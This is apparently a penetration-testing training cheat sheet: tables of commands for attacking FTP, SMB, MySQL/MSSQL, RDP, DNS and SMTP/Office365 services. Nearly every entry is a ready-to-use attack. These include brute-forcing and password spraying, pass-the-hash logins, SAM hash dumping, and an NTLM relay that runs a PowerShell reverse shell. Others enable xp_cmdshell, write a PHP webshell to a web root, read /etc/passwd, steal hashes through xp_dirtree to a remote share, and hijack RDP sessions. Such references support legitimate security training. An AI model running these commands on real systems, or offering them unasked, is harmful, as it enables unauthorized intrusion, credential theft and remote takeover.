| Command | Description |
|---|---|
ftp 192.168.2.142 |
Connecting to the FTP server using the ftp client. |
nc -v 192.168.2.142 21 |
Connecting to the FTP server using netcat. |
hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142 |
Brute-forcing the FTP service. |
| Command | Description |
|---|---|
smbclient -N -L //10.129.14.128 |
Null-session testing against the SMB service. |
smbmap -H 10.129.14.128 |
Network share enumeration using smbmap. |
smbmap -H 10.129.14.128 -r notes |
Recursive network share enumeration using smbmap. |
smbmap -H 10.129.14.128 --download "notes\note.txt" |
Download a specific file from the shared folder. |
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt" |
Upload a specific file to the shared folder. |
rpcclient -U'%' 10.10.110.17 |
Null-session with the rpcclient. |
./enum4linux-ng.py 10.10.11.45 -A -C |
Automated enumeratition of the SMB service using enum4linux-ng. |
crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' |
Password spraying against different users from a list. |
impacket-psexec administrator:'Password123!'@10.10.110.17 |
Connect to the SMB service using the impacket-psexec. |
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec |
Execute a command over the SMB service using crackmapexec. |
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users |
Enumerating Logged-on users. |
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam |
Extract hashes from the SAM database. |
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE |
Use the Pass-The-Hash technique to authenticate on the target host. |
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146 |
Dump the SAM database using impacket-ntlmrelayx. |
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <base64 reverse shell> |
Execute a PowerShell based reverse shell using impacket-ntlmrelayx. |
| Command | Description |
|---|---|
mysql -u julio -pPassword123 -h 10.129.20.13 |
Connecting to the MySQL server. |
sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30 |
Connecting to the MSSQL server. |
sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h |
Connecting to the MSSQL server from Linux. |
sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h |
Connecting to the MSSQL server from Linux while Windows Authentication mechanism is used by the MSSQL server. |
mysql> SHOW DATABASES; |
Show all available databases in MySQL. |
mysql> USE htbusers; |
Select a specific database in MySQL. |
mysql> SHOW TABLES; |
Show all available tables in the selected database in MySQL. |
mysql> SELECT * FROM users; |
Select all available entries from the "users" table in MySQL. |
sqlcmd> SELECT name FROM master.dbo.sysdatabases |
Show all available databases in MSSQL. |
sqlcmd> USE htbusers |
Select a specific database in MSSQL. |
sqlcmd> SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES |
Show all available tables in the selected database in MSSQL. |
sqlcmd> SELECT * FROM users |
Select all available entries from the "users" table in MSSQL. |
sqlcmd> EXECUTE sp_configure 'show advanced options', 1 |
To allow advanced options to be changed. |
sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1 |
To enable the xp_cmdshell. |
sqlcmd> RECONFIGURE |
To be used after each sp_configure command to apply the changes. |
sqlcmd> xp_cmdshell 'whoami' |
Execute a system command from MSSQL server. |
mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php' |
Create a file using MySQL. |
mysql> show variables like "secure_file_priv"; |
Check if the the secure file privileges are empty to read locally stored files on the system. |
sqlcmd> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents |
Read local files in MSSQL. |
mysql> select LOAD_FILE("/etc/passwd"); |
Read local files in MySQL. |
sqlcmd> EXEC master..xp_dirtree '\\10.10.110.17\share\' |
Hash stealing using the xp_dirtree command in MSSQL. |
sqlcmd> EXEC master..xp_subdirs '\\10.10.110.17\share\' |
Hash stealing using the xp_subdirs command in MSSQL. |
sqlcmd> SELECT srvname, isremote FROM sysservers |
Identify linked servers in MSSQL. |
sqlcmd> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS] |
Identify the user and its privileges used for the remote connection in MSSQL. |
| Command | Description |
|---|---|
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123' |
Password spraying against the RDP service. |
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp |
Brute-forcing the RDP service. |
rdesktop -u admin -p password123 192.168.2.143 |
Connect to the RDP service using rdesktop in Linux. |
tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME} |
Impersonate a user without its password. |
net start sessionhijack |
Execute the RDP session hijack. |
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f |
Enable "Restricted Admin Mode" on the target Windows host. |
xfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA |
Use the Pass-The-Hash technique to login on the target host without a password. |
| Command | Description |
|---|---|
dig AXFR @ns1.inlanefreight.htb inlanefreight.htb |
Perform an AXFR zone transfer attempt against a specific name server. |
subfinder -d inlanefreight.com -v |
Brute-forcing subdomains. |
host support.inlanefreight.com |
DNS lookup for the specified subdomain. |
| Command | Description |
|---|---|
host -t MX microsoft.com |
DNS lookup for mail servers for the specified domain. |
dig mx inlanefreight.com | grep "MX" | grep -v ";" |
DNS lookup for mail servers for the specified domain. |
host -t A mail1.inlanefreight.htb. |
DNS lookup of the IPv4 address for the specified subdomain. |
telnet 10.10.110.20 25 |
Connect to the SMTP server. |
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7 |
SMTP user enumeration using the RCPT command against the specified host. |
python3 o365spray.py --validate --domain msplaintext.xyz |
Verify the usage of Office365 for the specified domain. |
python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz |
Enumerate existing users using Office365 on the specified domain. |
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz |
Password spraying against a list of users that use Office365 for the specified domain. |
hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3 |
Brute-forcing the POP3 service. |
swaks --from [email protected] --to [email protected] --header 'Subject: Notification' --body 'Message' --server 10.10.11.213 |
Testing the SMTP service for the open-relay vulnerability. |